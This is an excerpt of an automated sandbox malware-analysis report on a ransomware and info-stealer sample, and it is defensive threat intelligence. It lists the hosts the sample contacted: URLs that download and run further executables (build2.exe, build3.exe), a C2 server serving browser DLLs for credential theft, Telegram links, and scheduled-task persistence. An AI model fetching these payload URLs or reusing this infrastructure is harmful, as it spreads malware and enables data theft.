                                              https://api.2ip.ua/d9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://116.202.0.196:10220/mozglue.dlltwarebuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://api.2ip.ua/geo.jsonv0z9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://116.202.0.196:10220/vcruntime140.dllbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://api.2ip.ua/i9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920870702.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921733753.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920210530.0000000000B89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.2ip.ua/geo.jsonl9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.2ip.ua/P9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1885029098.000000000993F000.00000004.00000020.00020000.00000000.sdmp, CFIJEBFC.5.drfalse
                                                          		high
                                                          https://api.2ip.ua/geo.jsone9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://zexeq.com/files/1/build3.exe$rune9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2368057315.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360968944.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • 17%, Virustotal, Browse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://t.me/bg3gotymedvsMozilla/5.0build2.exe, 00000004.00000002.1746811834.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://116.202.0.196:10220/nss3.dllbuild2.exe, 00000005.00000002.2909501585.0000000003628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.youtube.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1961052135.0000000003710000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://116.202.0.196:10220/Microsoftbuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://116.202.0.196:10220/llbuild2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://api.2ip.ua/geo.jsonN9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.2ip.ua/29dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCFIJEBFC.5.drfalse
                                                                      		high
                                                                      https://116.202.0.196:10220/sqlite3.dll.build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://116.202.0.196/build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://116.202.0.196:10220/.0.196:10220/Chedotbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://116.202.0.196:10220/build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1869958734.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://116.202.0.196:10220ngbuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://web.telegram.orgbuild2.exe, 00000005.00000003.1757407833.0000000000715000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://116.202.0.196/nbuild2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016strybuild2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://116.202.0.196:10220/vcruntime140.dllalbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://116.202.0.196:10220/msvcp140.dllsJH8build2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.amazon.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960766095.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1885029098.000000000993F000.00000004.00000020.00020000.00000000.sdmp, CFIJEBFC.5.drfalse
                                                                              		high
                                                                              http://zexeq.com/files/1/build3.exe$run9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • URL Reputation: malware
                                                                              		unknown
                                                                              https://116.202.0.196:10220nuxbuild2.exe, 00000005.00000002.2903117606.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		low
                                                                              https://t.me/bg3gotyHbuild2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.twitter.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1960992535.0000000003710000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.openssl.org/support/faq.html9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exefalse
                                                                                    		high
                                                                                    http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		low
                                                                                    https://t.me/Xbuild2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://api.2ip.ua/geo.jsonx9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://t.me/bg3gotyQbuild2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.2ip.ua/geo.jsont9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.00000000008C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://t.me/Rbuild2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallCFIJEBFC.5.drfalse
                                                                                                		high
                                                                                                https://api.2ip.ua/geo.jsons9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://116.202.0.196/Sbuild2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://116.202.0.196:10220/sqlite3.dllbuild2.exe, 00000005.00000002.2903117606.0000000000499000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016dfb6b41cbuild2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.sqlite.org/copyright.html.build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919203598.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://116.202.0.196:10220/nss3.dlltbuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://116.202.0.196:10220/freebl3.dlltwarebuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.nytimes.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1960930546.0000000003710000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://116.202.0.196:10220/softokn3.dllbuild2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://api.2ip.ua/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.0000000000887000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.0000000000889000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920870702.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921733753.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920210530.0000000000B89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://we.tl/t-99MNqXMrdS9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369105544.0000000003634000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360803674.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359472467.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362281614.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360926908.0000000003633000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://116.202.0.196:10220/softokn3.dllLOCALAPPDATA=C:build2.exe, 00000005.00000002.2909501585.000000000361F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://116.202.0.196:10220/vcruntime140.dllH1build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://116.202.0.196:10220/mozglue.dllosition:build2.exe, 00000005.00000002.2903117606.0000000000499000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://116.202.0.196:10220/msvcp140.dllgebuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://116.202.0.196:10220/freebl3.dllosition:build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://api.2ip.ua/279dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://116.202.0.196:10220/softokn3.dllgebuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://116.202.0.196:10220/oftbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://116.202.0.196/amDatabuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://116.202.0.196:10220/(build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://116.202.0.196:10220/vcruntime140.dllserbuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://brusuax.com/dl/build2.exe$run9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://116.202.0.196:10220/mozglue.dlldgebuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.wikipedia.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1961014542.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://assets.activity.windows.com9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              172.67.139.220
                                                                                                              		api.2ip.uaUnited States
                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                              116.202.0.196
                                                                                                              		unknownGermany
                                                                                                              		24940HETZNER-ASDEfalse
                                                                                                              186.147.159.149
                                                                                                              		brusuax.comColombia
                                                                                                              		10620TelmexColombiaSACOtrue
                                                                                                              149.154.167.99
                                                                                                              		t.meUnited Kingdom
                                                                                                              		62041TELEGRAMRUfalse
                                                                                                              175.120.254.9
                                                                                                              		zexeq.comKorea Republic of
                                                                                                              		9318SKB-ASSKBroadbandCoLtdKRtrue

                                                                                                              General Information

                                                                                                              Joe Sandbox version:38.0.0 Ammolite
                                                                                                              Analysis ID:1373508
                                                                                                              Start date and time:2024-01-12 06:47:05 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 11m 13s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:13
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@12/1265@8/5
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 99%
                                                                                                              • Number of executed functions: 100
                                                                                                              • Number of non-executed functions: 223
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 72.21.81.240
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadFile calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                              • Report size getting too big, too many NtWriteFile calls found.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              05:47:55Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe s>--Task
